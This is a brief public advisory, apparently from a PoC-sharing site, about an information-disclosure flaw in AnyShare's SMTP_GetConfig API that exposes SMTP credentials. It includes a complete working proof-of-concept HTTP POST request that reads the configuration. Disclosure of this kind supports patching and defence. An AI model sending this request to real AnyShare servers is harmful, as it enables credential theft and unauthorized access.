爱数 AnyShare /api/ShareMgnt/SMTP_GetConfig 信息泄露漏洞

2025-01-17 爱数AnyShare PoC Public

Description

爱数AnyShare的SMTP_GetConfig接口存在信息泄露漏洞。攻击者可以通过该接口获取到敏感的配置信息,例如SMTP服务器的用户名和密码等。攻击者通过构造特殊URL地址,读取系统敏感信息。

PoC

POST /api/ShareMgnt/SMTP_GetConfig HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
Content-Length: 2
Content-Type: application/json

{}

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities